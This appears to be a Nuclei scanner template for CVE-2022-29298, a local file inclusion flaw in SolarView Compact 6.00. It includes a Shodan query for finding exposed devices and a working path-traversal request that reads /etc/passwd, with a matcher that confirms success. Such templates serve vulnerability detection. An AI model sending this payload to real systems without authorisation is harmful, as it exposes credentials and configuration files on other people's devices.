id: CVE-2022-29298 info: name: SolarView Compact 6.00 - Local File Inclusion author: ritikchaddha severity: high description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in SolarView Compact 6.00. reference: - https://www.exploit-db.com/exploits/50950 - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing - https://nvd.nist.gov/vuln/detail/CVE-2022-29298 - https://github.com/20142995/pocsuite3 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-29298 cwe-id: CWE-22 epss-score: 0.1374 epss-percentile: 0.95497 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: contec product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" tags: cve,cve2022,lfi,solarview,edb,contec http: - method: GET path: - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 490a00463044022078d081edda1941e7be81d051567065c4e396282660f623323433ef782d79da2902205556917e13179bce84c0fd7d72192302ad7189776bf60aa56d15335d18521f44:922c64590222798bb761d5b6d8e72950